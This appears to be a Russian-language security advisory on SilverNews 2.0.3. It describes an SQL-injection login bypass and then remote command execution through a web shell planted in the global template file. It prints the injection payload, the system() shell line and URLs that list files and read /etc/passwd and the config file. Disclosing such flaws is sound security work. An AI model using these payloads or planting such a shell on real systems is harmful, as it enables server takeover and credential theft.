Xakep #305. Многошаговые SQL-инъекции
Программа: SilverNews 2.0.3
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения и произвольные системные команды на целевом сервере.
Уязвимость существует из-за недостаточной обработки входных данных в переменной user при выключенной опции magic_quotes. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды на целевой системе.
Пример:
user: ' or isnull(1/0) /*
pass: whatever
Получив административные привилегии, злоумышленник может отредактировать специальным образом глобальный шаблон '/templates/tpl_global.php'.
Пример:
//***********************************************
</body>
</html>
TEMPLATE;
}
}
system($HTTP _GET_VARS[command]);
И, затем, с помощью специально сформированного URL выполнить произвольные команды на целевой системе с привилегиями web сервера.
Примеры:
http://[target]/[path]//templates/tpl_global.php?command=ls%20-la
http://[target]/[path]/templates/TPL_GLOBAL.PHP?command= cat%20/etc/passwd
http://[target]/[path]/templates/TPL_GLOBAL.PHP?command= cat%20/[path_to_config_file]/data.inc.php